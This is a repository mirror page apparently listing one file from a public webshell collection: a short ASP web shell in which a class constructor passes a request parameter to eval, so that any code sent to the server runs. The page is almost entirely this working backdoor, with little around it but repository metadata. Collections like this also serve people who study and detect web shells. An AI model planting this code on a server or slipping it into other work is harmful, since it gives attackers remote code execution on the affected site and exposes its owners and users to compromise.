1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-06 04:41:28 +00:00
Files
webshell/asp/class-initialize.asp
2018-12-20 11:41:24 +08:00

9 lines
132 B
Plaintext

<%
Class LandGrey
Private Sub Class_Initialize
eval (request("LandGrey"))
End Sub
End Class
Set X = New LandGrey
%>